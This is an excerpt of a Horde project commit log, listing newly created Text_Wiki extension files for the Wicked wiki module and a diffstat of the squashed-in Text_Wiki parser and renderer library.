 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Cowiki/Image2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Cowiki/Registrylink.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Cowiki/Wickedblock.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Cowiki/Wikilink2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Creole/Attribute.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Creole/Heading2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Creole/Image2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Creole/Registrylink.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Creole/Wickedblock.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Creole/Wikilink2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Default/Attribute.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Default/Code2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Default/Freelink2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Default/Heading2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Default/Image2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Default/Registrylink.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Default/Toc2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Default/Wickedblock.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Default/Wikilink2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Mediawiki/Attribute.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Mediawiki/Code2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Mediawiki/Heading2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Mediawiki/Image2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Mediawiki/Registrylink.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Mediawiki/Wickedblock.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Mediawiki/Wikilink2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Tiki/Attribute.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Tiki/Code2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Tiki/Freelink2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Tiki/Heading2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Tiki/Image2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Tiki/Registrylink.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Tiki/Wickedblock.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Tiki/Wikilink2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Latex/Heading2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Latex/Toc2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Plain/Heading2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Plain/Toc2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Blockquote.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Bold.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Code.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Deflist.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Emphasis.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Freelink.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Heading2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Horiz.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Links.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/List.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Newline.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Paragraph.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Raw.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Toc2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Tt.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Url.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Xhtml/Attribute.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Xhtml/Code2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Xhtml/Freelink2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Xhtml/Heading2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Xhtml/Image2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Xhtml/Interwiki.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Xhtml/Registrylink.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Xhtml/Toc2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Xhtml/Url.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Xhtml/Wickedblock.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Xhtml/Wikilink2.php

http://github.com/horde/horde/commit/4a6e4863be64bd2d807a49ae2b8e495f1b36cbc9

-----------------------------------------------------------------------

commit 1ef5c58c4803938f47cd76d72536248f6f2b6d91
Author: Jan Schneider 
Date:   Wed Sep 6 11:00:10 2017 +0200

    Squashed 'wicked/lib/Text_Wiki/' content from commit 2b7fa54
    
    git-subtree-dir: wicked/lib/Text_Wiki
    git-subtree-split: 2b7fa546469029009782bcab89c41c9c108f2da6

 .gitignore                                         |    4 +
 .travis.yml                                        |    7 +
 Text/Wiki.php                                      | 1539 ++++++++++++++++++++
 Text/Wiki/BBCode.php                               |  100 ++
 Text/Wiki/Cowiki.php                               |   43 +
 Text/Wiki/Creole.php                               |  150 ++
 Text/Wiki/Default.php                              |   27 +
 Text/Wiki/Doku.php                                 |   43 +
 Text/Wiki/Mediawiki.php                            |   95 ++
 Text/Wiki/Parse.php                                |  264 ++++
 Text/Wiki/Parse/BBCode/Blockquote.php              |   91 ++
 Text/Wiki/Parse/BBCode/Bold.php                    |   63 +
 Text/Wiki/Parse/BBCode/Code.php                    |   63 +
 Text/Wiki/Parse/BBCode/Colortext.php               |   92 ++
 Text/Wiki/Parse/BBCode/Font.php                    |   87 ++
 Text/Wiki/Parse/BBCode/Image.php                   |  102 ++
 Text/Wiki/Parse/BBCode/Italic.php                  |   62 +
 Text/Wiki/Parse/BBCode/List.php                    |  187 +++
 Text/Wiki/Parse/BBCode/Subscript.php               |   85 ++
 Text/Wiki/Parse/BBCode/Superscript.php             |   84 ++
 Text/Wiki/Parse/BBCode/Underline.php               |   63 +
 Text/Wiki/Parse/BBCode/Url.php                     |  185 +++
 Text/Wiki/Parse/Cowiki/Anchor.php                  |   88 ++
 Text/Wiki/Parse/Cowiki/Blockquote.php              |  180 +++
 Text/Wiki/Parse/Cowiki/Bold.php                    |   79 +
 Text/Wiki/Parse/Cowiki/Break.php                   |   73 +
 Text/Wiki/Parse/Cowiki/Center.php                  |   79 +
 Text/Wiki/Parse/Cowiki/Code.php                    |   99 ++
 Text/Wiki/Parse/Cowiki/Colortext.php               |   90 ++
 Text/Wiki/Parse/Cowiki/Deflist.php                 |  123 ++
 Text/Wiki/Parse/Cowiki/Delimiter.php               |   80 +
 Text/Wiki/Parse/Cowiki/Embed.php                   |  107 ++
 Text/Wiki/Parse/Cowiki/Emphasis.php                |   81 ++
 Text/Wiki/Parse/Cowiki/Freelink.php                |   74 +
 Text/Wiki/Parse/Cowiki/Function.php                |  142 ++
 Text/Wiki/Parse/Cowiki/Heading.php                 |  107 ++
 Text/Wiki/Parse/Cowiki/Horiz.php                   |   70 +
 Text/Wiki/Parse/Cowiki/Html.php                    |   76 +
 Text/Wiki/Parse/Cowiki/Image.php                   |   85 ++
 Text/Wiki/Parse/Cowiki/Include.php                 |  100 ++
 Text/Wiki/Parse/Cowiki/Interwiki.php               |  142 ++
 Text/Wiki/Parse/Cowiki/Italic.php                  |   79 +
 Text/Wiki/Parse/Cowiki/List.php                    |  246 ++++
 Text/Wiki/Parse/Cowiki/Newline.php                 |   75 +
 Text/Wiki/Parse/Cowiki/Paragraph.php               |  146 ++
 Text/Wiki/Parse/Cowiki/Phplookup.php               |   73 +
 Text/Wiki/Parse/Cowiki/Prefilter.php               |   78 +
 Text/Wiki/Parse/Cowiki/Raw.php                     |   72 +
 Text/Wiki/Parse/Cowiki/Revise.php                  |  170 +++
 Text/Wiki/Parse/Cowiki/Strong.php                  |   85 ++
 Text/Wiki/Parse/Cowiki/Subscript.php               |   79 +
 Text/Wiki/Parse/Cowiki/Superscript.php             |   79 +
 Text/Wiki/Parse/Cowiki/Table.php                   |  214 +++
 Text/Wiki/Parse/Cowiki/Tighten.php                 |   49 +
 Text/Wiki/Parse/Cowiki/Toc.php                     |   93 ++
 Text/Wiki/Parse/Cowiki/Tt.php                      |   84 ++
 Text/Wiki/Parse/Cowiki/Underline.php               |   79 +
 Text/Wiki/Parse/Cowiki/Url.php                     |  281 ++++
 Text/Wiki/Parse/Cowiki/Wikilink.php                |  227 +++
 Text/Wiki/Parse/Creole/Address.php                 |   67 +
 Text/Wiki/Parse/Creole/Blockquote.php              |  176 +++
 Text/Wiki/Parse/Creole/Bold.php                    |   82 ++
 Text/Wiki/Parse/Creole/Box.php                     |   81 ++
 Text/Wiki/Parse/Creole/Break.php                   |   73 +
 Text/Wiki/Parse/Creole/Center.php                  |   78 +
 Text/Wiki/Parse/Creole/Deflist.php                 |  129 ++
 Text/Wiki/Parse/Creole/Delimiter.php               |   68 +
 Text/Wiki/Parse/Creole/Emphasis.php                |   83 ++
 Text/Wiki/Parse/Creole/Footnote.php                |   83 ++
 Text/Wiki/Parse/Creole/Heading.php                 |   97 ++
 Text/Wiki/Parse/Creole/Horiz.php                   |   58 +
 Text/Wiki/Parse/Creole/Image.php                   |   69 +
 Text/Wiki/Parse/Creole/Italic.php                  |   81 ++
 Text/Wiki/Parse/Creole/List.php                    |  244 ++++
 Text/Wiki/Parse/Creole/Newline.php                 |   60 +
 Text/Wiki/Parse/Creole/Paragraph.php               |  139 ++
 Text/Wiki/Parse/Creole/Prefilter.php               |   54 +
 Text/Wiki/Parse/Creole/Preformatted.php            |   68 +
 Text/Wiki/Parse/Creole/Raw.php                     |   61 +
 Text/Wiki/Parse/Creole/Strong.php                  |   84 ++
 Text/Wiki/Parse/Creole/Subscript.php               |   75 +
 Text/Wiki/Parse/Creole/Superscript.php             |   75 +
 Text/Wiki/Parse/Creole/Table.php                   |  207 +++
 Text/Wiki/Parse/Creole/Tighten.php                 |   37 +
 Text/Wiki/Parse/Creole/Trim.php                    |   75 +
 Text/Wiki/Parse/Creole/Tt.php                      |   78 +
 Text/Wiki/Parse/Creole/Underline.php               |   83 ++
 Text/Wiki/Parse/Creole/Url.php                     |  109 ++
 Text/Wiki/Parse/Creole/Wikilink.php                |  322 ++++
 Text/Wiki/Parse/Default/Anchor.php                 |   87 ++
 Text/Wiki/Parse/Default/Blockquote.php             |  162 +++
 Text/Wiki/Parse/Default/Bold.php                   |   79 +
 Text/Wiki/Parse/Default/Break.php                  |   72 +
 Text/Wiki/Parse/Default/Center.php                 |   78 +
 Text/Wiki/Parse/Default/Code.php                   |  100 ++
 Text/Wiki/Parse/Default/Colortext.php              |   89 ++
 Text/Wiki/Parse/Default/Deflist.php                |  122 ++
 Text/Wiki/Parse/Default/Delimiter.php              |   80 +
 Text/Wiki/Parse/Default/Embed.php                  |  106 ++
 Text/Wiki/Parse/Default/Emphasis.php               |   85 ++
 Text/Wiki/Parse/Default/Freelink.php               |  134 ++
 Text/Wiki/Parse/Default/Function.php               |  141 ++
 Text/Wiki/Parse/Default/Heading.php                |  107 ++
 Text/Wiki/Parse/Default/Horiz.php                  |   70 +
 Text/Wiki/Parse/Default/Html.php                   |   75 +
 Text/Wiki/Parse/Default/Image.php                  |  136 ++
 Text/Wiki/Parse/Default/Include.php                |  100 ++
 Text/Wiki/Parse/Default/Interwiki.php              |  138 ++
 Text/Wiki/Parse/Default/Italic.php                 |   85 ++
 Text/Wiki/Parse/Default/List.php                   |  262 ++++
 Text/Wiki/Parse/Default/Newline.php                |   75 +
 Text/Wiki/Parse/Default/Paragraph.php              |  116 ++
 Text/Wiki/Parse/Default/Phplookup.php              |   73 +
 Text/Wiki/Parse/Default/Prefilter.php              |   84 ++
 Text/Wiki/Parse/Default/Raw.php                    |   73 +
 Text/Wiki/Parse/Default/Revise.php                 |  145 ++
 Text/Wiki/Parse/Default/Smiley.php                 |  157 ++
 Text/Wiki/Parse/Default/Strong.php                 |   86 ++
 Text/Wiki/Parse/Default/Subscript.php              |   79 +
 Text/Wiki/Parse/Default/Superscript.php            |   79 +
 Text/Wiki/Parse/Default/Table.php                  |  226 +++
 Text/Wiki/Parse/Default/Tighten.php                |   49 +
 Text/Wiki/Parse/Default/Toc.php                    |  130 ++
 Text/Wiki/Parse/Default/Tt.php                     |   84 ++
 Text/Wiki/Parse/Default/Underline.php              |   79 +
 Text/Wiki/Parse/Default/Url.php                    |  281 ++++
 Text/Wiki/Parse/Default/Wikilink.php               |  203 +++
 Text/Wiki/Parse/Doku/Anchor.php                    |   88 ++
 Text/Wiki/Parse/Doku/Blockquote.php                |  180 +++
 Text/Wiki/Parse/Doku/Bold.php                      |   79 +
 Text/Wiki/Parse/Doku/Break.php                     |   73 +
 Text/Wiki/Parse/Doku/Center.php                    |   79 +
 Text/Wiki/Parse/Doku/Code.php                      |   95 ++
 Text/Wiki/Parse/Doku/Colortext.php                 |   90 ++
 Text/Wiki/Parse/Doku/Deflist.php                   |  123 ++
 Text/Wiki/Parse/Doku/Delimiter.php                 |   80 +
 Text/Wiki/Parse/Doku/Embed.php                     |  107 ++
 Text/Wiki/Parse/Doku/Emphasis.php                  |   85 ++
 Text/Wiki/Parse/Doku/Freelink.php                  |   99 ++
 Text/Wiki/Parse/Doku/Function.php                  |  142 ++
 Text/Wiki/Parse/Doku/Heading.php                   |  107 ++
 Text/Wiki/Parse/Doku/Horiz.php                     |   70 +
 Text/Wiki/Parse/Doku/Html.php                      |   75 +
 Text/Wiki/Parse/Doku/Image.php                     |   99 ++
 Text/Wiki/Parse/Doku/Include.php                   |  101 ++
 Text/Wiki/Parse/Doku/Interwiki.php                 |   96 ++
 Text/Wiki/Parse/Doku/Italic.php                    |   84 ++
 Text/Wiki/Parse/Doku/List.php                      |  248 ++++
 Text/Wiki/Parse/Doku/Newline.php                   |   75 +
 Text/Wiki/Parse/Doku/Paragraph.php                 |  146 ++
 Text/Wiki/Parse/Doku/Phplookup.php                 |   74 +
 Text/Wiki/Parse/Doku/Prefilter.php                 |   78 +
 Text/Wiki/Parse/Doku/Raw.php                       |   87 ++
 Text/Wiki/Parse/Doku/Revise.php                    |  168 +++
 Text/Wiki/Parse/Doku/Strong.php                    |   90 ++
 Text/Wiki/Parse/Doku/Subscript.php                 |   79 +
 Text/Wiki/Parse/Doku/Superscript.php               |   79 +
 Text/Wiki/Parse/Doku/Table.php                     |  240 +++
 Text/Wiki/Parse/Doku/Tighten.php                   |   49 +
 Text/Wiki/Parse/Doku/Toc.php                       |   84 ++
 Text/Wiki/Parse/Doku/Tt.php                        |   84 ++
 Text/Wiki/Parse/Doku/Underline.php                 |   79 +
 Text/Wiki/Parse/Doku/Url.php                       |  326 +++++
 Text/Wiki/Parse/Doku/Wikilink.php                  |  123 ++
 Text/Wiki/Parse/Mediawiki/Break.php                |   59 +
 Text/Wiki/Parse/Mediawiki/Code.php                 |   91 ++
 Text/Wiki/Parse/Mediawiki/Comment.php              |   59 +
 Text/Wiki/Parse/Mediawiki/Deflist.php              |  293 ++++
 Text/Wiki/Parse/Mediawiki/Emphasis.php             |  264 ++++
 Text/Wiki/Parse/Mediawiki/Heading.php              |   94 ++
 Text/Wiki/Parse/Mediawiki/List.php                 |  232 +++
 Text/Wiki/Parse/Mediawiki/Newline.php              |   59 +
 Text/Wiki/Parse/Mediawiki/Preformatted.php         |   72 +
 Text/Wiki/Parse/Mediawiki/Raw.php                  |   61 +
 Text/Wiki/Parse/Mediawiki/Redirect.php             |   77 +
 Text/Wiki/Parse/Mediawiki/Subscript.php            |   65 +
 Text/Wiki/Parse/Mediawiki/Superscript.php          |   65 +
 Text/Wiki/Parse/Mediawiki/Table.php                |  286 ++++
 Text/Wiki/Parse/Mediawiki/Tt.php                   |   71 +
 Text/Wiki/Parse/Mediawiki/Url.php                  |  318 ++++
 Text/Wiki/Parse/Mediawiki/Wikilink.php             |  312 ++++
 Text/Wiki/Parse/Tiki/Anchor.php                    |   89 ++
 Text/Wiki/Parse/Tiki/Blockquote.php                |  181 +++
 Text/Wiki/Parse/Tiki/Bold.php                      |   81 ++
 Text/Wiki/Parse/Tiki/Box.php                       |   81 ++
 Text/Wiki/Parse/Tiki/Break.php                     |   74 +
 Text/Wiki/Parse/Tiki/Center.php                    |   80 +
 Text/Wiki/Parse/Tiki/Code.php                      |  116 ++
 Text/Wiki/Parse/Tiki/Colortext.php                 |   91 ++
 Text/Wiki/Parse/Tiki/Deflist.php                   |  124 ++
 Text/Wiki/Parse/Tiki/Delimiter.php                 |   82 ++
 Text/Wiki/Parse/Tiki/Embed.php                     |  108 ++
 Text/Wiki/Parse/Tiki/Emphasis.php                  |   87 ++
 Text/Wiki/Parse/Tiki/Freelink.php                  |  138 ++
 Text/Wiki/Parse/Tiki/Heading.php                   |  132 ++
 Text/Wiki/Parse/Tiki/Horiz.php                     |   72 +
 Text/Wiki/Parse/Tiki/Html.php                      |   77 +
 Text/Wiki/Parse/Tiki/Image.php                     |  114 ++
 Text/Wiki/Parse/Tiki/Include.php                   |  102 ++
 Text/Wiki/Parse/Tiki/Interwiki.php                 |  140 ++
 Text/Wiki/Parse/Tiki/Italic.php                    |   87 ++
 Text/Wiki/Parse/Tiki/List.php                      |  250 ++++
 Text/Wiki/Parse/Tiki/Newline.php                   |   77 +
 Text/Wiki/Parse/Tiki/Page.php                      |   69 +
 Text/Wiki/Parse/Tiki/Paragraph.php                 |  148 ++
 Text/Wiki/Parse/Tiki/Plugin.php                    |  134 ++
 Text/Wiki/Parse/Tiki/Prefilter.php                 |   80 +
 Text/Wiki/Parse/Tiki/Preformatted.php              |   74 +
 Text/Wiki/Parse/Tiki/Raw.php                       |   74 +
 Text/Wiki/Parse/Tiki/Revise.php                    |  147 ++
 Text/Wiki/Parse/Tiki/Smiley.php                    |   67 +
 Text/Wiki/Parse/Tiki/Specialchar.php               |   73 +
 Text/Wiki/Parse/Tiki/Strong.php                    |   92 ++
 Text/Wiki/Parse/Tiki/Subscript.php                 |   82 ++
 Text/Wiki/Parse/Tiki/Superscript.php               |   82 ++
 Text/Wiki/Parse/Tiki/Table.php                     |  235 +++
 Text/Wiki/Parse/Tiki/Tighten.php                   |   51 +
 Text/Wiki/Parse/Tiki/Titlebar.php                  |   45 +
 Text/Wiki/Parse/Tiki/Toc.php                       |   82 ++
 Text/Wiki/Parse/Tiki/Tt.php                        |   86 ++
 Text/Wiki/Parse/Tiki/Underline.php                 |   81 ++
 Text/Wiki/Parse/Tiki/Url.php                       |  293 ++++
 Text/Wiki/Parse/Tiki/Wikilink.php                  |  224 +++
 Text/Wiki/Render.php                               |  218 +++
 Text/Wiki/Render/Cowiki.php                        |   16 +
 Text/Wiki/Render/Cowiki/Anchor.php                 |   23 +
 Text/Wiki/Render/Cowiki/Blockquote.php             |   23 +
 Text/Wiki/Render/Cowiki/Bold.php                   |   23 +
 Text/Wiki/Render/Cowiki/Box.php                    |   33 +
 Text/Wiki/Render/Cowiki/Break.php                  |   24 +
 Text/Wiki/Render/Cowiki/Center.php                 |   23 +
 Text/Wiki/Render/Cowiki/Code.php                   |   23 +
 Text/Wiki/Render/Cowiki/Colortext.php              |   23 +
 Text/Wiki/Render/Cowiki/Deflist.php                |   23 +
 Text/Wiki/Render/Cowiki/Delimiter.php              |   23 +
 Text/Wiki/Render/Cowiki/Embed.php                  |   23 +
 Text/Wiki/Render/Cowiki/Emphasis.php               |   23 +
 Text/Wiki/Render/Cowiki/Freelink.php               |    9 +
 Text/Wiki/Render/Cowiki/Function.php               |   25 +
 Text/Wiki/Render/Cowiki/Heading.php                |   13 +
 Text/Wiki/Render/Cowiki/Horiz.php                  |   23 +
 Text/Wiki/Render/Cowiki/Html.php                   |   23 +
 Text/Wiki/Render/Cowiki/Image.php                  |   23 +
 Text/Wiki/Render/Cowiki/Include.php                |    8 +
 Text/Wiki/Render/Cowiki/Interwiki.php              |   23 +
 Text/Wiki/Render/Cowiki/Italic.php                 |   23 +
 Text/Wiki/Render/Cowiki/List.php                   |   56 +
 Text/Wiki/Render/Cowiki/Newline.php                |   13 +
 Text/Wiki/Render/Cowiki/Paragraph.php              |   23 +
 Text/Wiki/Render/Cowiki/Phplookup.php              |   25 +
 Text/Wiki/Render/Cowiki/Prefilter.php              |   25 +
 Text/Wiki/Render/Cowiki/Raw.php                    |   23 +
 Text/Wiki/Render/Cowiki/Revise.php                 |   36 +
 Text/Wiki/Render/Cowiki/Strong.php                 |   23 +
 Text/Wiki/Render/Cowiki/Subscript.php              |   29 +
 Text/Wiki/Render/Cowiki/Superscript.php            |   29 +
 Text/Wiki/Render/Cowiki/Table.php                  |   55 +
 Text/Wiki/Render/Cowiki/Tighten.php                |   10 +
 Text/Wiki/Render/Cowiki/Toc.php                    |   25 +
 Text/Wiki/Render/Cowiki/Tt.php                     |   29 +
 Text/Wiki/Render/Cowiki/Underline.php              |   23 +
 Text/Wiki/Render/Cowiki/Url.php                    |   45 +
 Text/Wiki/Render/Cowiki/Wikilink.php               |   29 +
 Text/Wiki/Render/Creole.php                        |   16 +
 Text/Wiki/Render/Creole/Address.php                |   29 +
 Text/Wiki/Render/Creole/Anchor.php                 |   23 +
 Text/Wiki/Render/Creole/Blockquote.php             |   47 +
 Text/Wiki/Render/Creole/Bold.php                   |   23 +
 Text/Wiki/Render/Creole/Box.php                    |   30 +
 Text/Wiki/Render/Creole/Break.php                  |   24 +
 Text/Wiki/Render/Creole/Center.php                 |   30 +
 Text/Wiki/Render/Creole/Code.php                   |   23 +
 Text/Wiki/Render/Creole/Colortext.php              |   23 +
 Text/Wiki/Render/Creole/Deflist.php                |   23 +
 Text/Wiki/Render/Creole/Delimiter.php              |   23 +
 Text/Wiki/Render/Creole/Embed.php                  |   29 +
 Text/Wiki/Render/Creole/Emphasis.php               |   23 +
 Text/Wiki/Render/Creole/Freelink.php               |    9 +
 Text/Wiki/Render/Creole/Function.php               |   23 +
 Text/Wiki/Render/Creole/Heading.php                |   16 +
 Text/Wiki/Render/Creole/Horiz.php                  |   23 +
 Text/Wiki/Render/Creole/Html.php                   |   23 +
 Text/Wiki/Render/Creole/Image.php                  |   26 +
 Text/Wiki/Render/Creole/Include.php                |   16 +
 Text/Wiki/Render/Creole/Interwiki.php              |   23 +
 Text/Wiki/Render/Creole/Italic.php                 |   23 +
 Text/Wiki/Render/Creole/List.php                   |   53 +
 Text/Wiki/Render/Creole/Newline.php                |   12 +
 Text/Wiki/Render/Creole/Paragraph.php              |   29 +
 Text/Wiki/Render/Creole/Phplookup.php              |   25 +
 Text/Wiki/Render/Creole/Prefilter.php              |   10 +
 Text/Wiki/Render/Creole/Preformatted.php           |   27 +
 Text/Wiki/Render/Creole/Raw.php                    |   33 +
 Text/Wiki/Render/Creole/Revise.php                 |   23 +
 Text/Wiki/Render/Creole/Strong.php                 |   23 +
 Text/Wiki/Render/Creole/Subscript.php              |   23 +
 Text/Wiki/Render/Creole/Superscript.php            |   23 +
 Text/Wiki/Render/Creole/Table.php                  |   70 +
 Text/Wiki/Render/Creole/Tighten.php                |   10 +
 Text/Wiki/Render/Creole/Toc.php                    |   23 +
 Text/Wiki/Render/Creole/Tt.php                     |   29 +
 Text/Wiki/Render/Creole/Underline.php              |   23 +
 Text/Wiki/Render/Creole/Url.php                    |   40 +
 Text/Wiki/Render/Creole/Wikilink.php               |   43 +
 Text/Wiki/Render/Docbook.php                       |   45 +
 Text/Wiki/Render/Docbook/Anchor.php                |   40 +
 Text/Wiki/Render/Docbook/Blockquote.php            |   53 +
 Text/Wiki/Render/Docbook/Bold.php                  |   54 +
 Text/Wiki/Render/Docbook/Box.php                   |   54 +
 Text/Wiki/Render/Docbook/Break.php                 |   47 +
 Text/Wiki/Render/Docbook/Center.php                |   51 +
 Text/Wiki/Render/Docbook/Code.php                  |   52 +
 Text/Wiki/Render/Docbook/Colortext.php             |   80 +
 Text/Wiki/Render/Docbook/Deflist.php               |   75 +
 Text/Wiki/Render/Docbook/Delimiter.php             |   46 +
 Text/Wiki/Render/Docbook/Embed.php                 |   47 +
 Text/Wiki/Render/Docbook/Emphasis.php              |   55 +
 Text/Wiki/Render/Docbook/Font.php                  |   59 +
 Text/Wiki/Render/Docbook/Freelink.php              |   35 +
 Text/Wiki/Render/Docbook/Function.php              |   73 +
 Text/Wiki/Render/Docbook/Heading.php               |  185 +++
 Text/Wiki/Render/Docbook/Horiz.php                 |   46 +
 Text/Wiki/Render/Docbook/Html.php                  |   48 +
 Text/Wiki/Render/Docbook/Image.php                 |  180 +++
 Text/Wiki/Render/Docbook/Include.php               |   32 +
 Text/Wiki/Render/Docbook/Interwiki.php             |   80 +
 Text/Wiki/Render/Docbook/Italic.php                |   54 +
 Text/Wiki/Render/Docbook/List.php                  |   95 ++
 Text/Wiki/Render/Docbook/Newline.php               |   34 +
 Text/Wiki/Render/Docbook/Page.php                  |   46 +
 Text/Wiki/Render/Docbook/Paragraph.php             |   49 +
 Text/Wiki/Render/Docbook/Phplookup.php             |   59 +
 Text/Wiki/Render/Docbook/Plugin.php                |   47 +
 Text/Wiki/Render/Docbook/Prefilter.php             |   34 +
 Text/Wiki/Render/Docbook/Preformatted.php          |   46 +
 Text/Wiki/Render/Docbook/Raw.php                   |   45 +
 Text/Wiki/Render/Docbook/Revise.php                |   61 +
 Text/Wiki/Render/Docbook/Smiley.php                |   74 +
 Text/Wiki/Render/Docbook/Specialchar.php           |   52 +
 Text/Wiki/Render/Docbook/Strong.php                |   54 +
 Text/Wiki/Render/Docbook/Subscript.php             |   49 +
 Text/Wiki/Render/Docbook/Superscript.php           |   49 +
 Text/Wiki/Render/Docbook/Table.php                 |  140 ++
 Text/Wiki/Render/Docbook/Tighten.php               |   34 +
 Text/Wiki/Render/Docbook/Titlebar.php              |   57 +
 Text/Wiki/Render/Docbook/Toc.php                   |  115 ++
 Text/Wiki/Render/Docbook/Tt.php                    |   49 +
 Text/Wiki/Render/Docbook/Underline.php             |   54 +
 Text/Wiki/Render/Docbook/Url.php                   |  125 ++
 Text/Wiki/Render/Docbook/Wikilink.php              |  160 ++
 Text/Wiki/Render/Doku.php                          |   16 +
 Text/Wiki/Render/Doku/Anchor.php                   |   33 +
 Text/Wiki/Render/Doku/Blockquote.php               |   37 +
 Text/Wiki/Render/Doku/Bold.php                     |   23 +
 Text/Wiki/Render/Doku/Box.php                      |   34 +
 Text/Wiki/Render/Doku/Break.php                    |   24 +
 Text/Wiki/Render/Doku/Center.php                   |   29 +
 Text/Wiki/Render/Doku/Code.php                     |   23 +
 Text/Wiki/Render/Doku/Colortext.php                |   52 +
 Text/Wiki/Render/Doku/Deflist.php                  |   23 +
 Text/Wiki/Render/Doku/Delimiter.php                |   23 +
 Text/Wiki/Render/Doku/Embed.php                    |   23 +
 Text/Wiki/Render/Doku/Emphasis.php                 |   23 +
 Text/Wiki/Render/Doku/Freelink.php                 |    9 +
 Text/Wiki/Render/Doku/Function.php                 |   70 +
 Text/Wiki/Render/Doku/Heading.php                  |   11 +
 Text/Wiki/Render/Doku/Horiz.php                    |   23 +
 Text/Wiki/Render/Doku/Html.php                     |   23 +
 Text/Wiki/Render/Doku/Image.php                    |   39 +
 Text/Wiki/Render/Doku/Include.php                  |    8 +
 Text/Wiki/Render/Doku/Interwiki.php                |   23 +
 Text/Wiki/Render/Doku/Italic.php                   |   23 +
 Text/Wiki/Render/Doku/List.php                     |   56 +
 Text/Wiki/Render/Doku/Newline.php                  |   13 +
 Text/Wiki/Render/Doku/Paragraph.php                |   23 +
 Text/Wiki/Render/Doku/Phplookup.php                |   25 +
 Text/Wiki/Render/Doku/Prefilter.php                |   25 +
 Text/Wiki/Render/Doku/Raw.php                      |   23 +
 Text/Wiki/Render/Doku/Revise.php                   |   36 +
 Text/Wiki/Render/Doku/Strong.php                   |   23 +
 Text/Wiki/Render/Doku/Subscript.php                |   29 +
 Text/Wiki/Render/Doku/Superscript.php              |   29 +
 Text/Wiki/Render/Doku/Table.php                    |   96 ++
 Text/Wiki/Render/Doku/Tighten.php                  |   10 +
 Text/Wiki/Render/Doku/Toc.php                      |   26 +
 Text/Wiki/Render/Doku/Tt.php                       |   29 +
 Text/Wiki/Render/Doku/Underline.php                |   23 +
 Text/Wiki/Render/Doku/Url.php                      |   52 +
 Text/Wiki/Render/Doku/Wikilink.php                 |   33 +
 Text/Wiki/Render/Latex.php                         |   90 ++
 Text/Wiki/Render/Latex/Anchor.php                  |   33 +
 Text/Wiki/Render/Latex/Blockquote.php              |   36 +
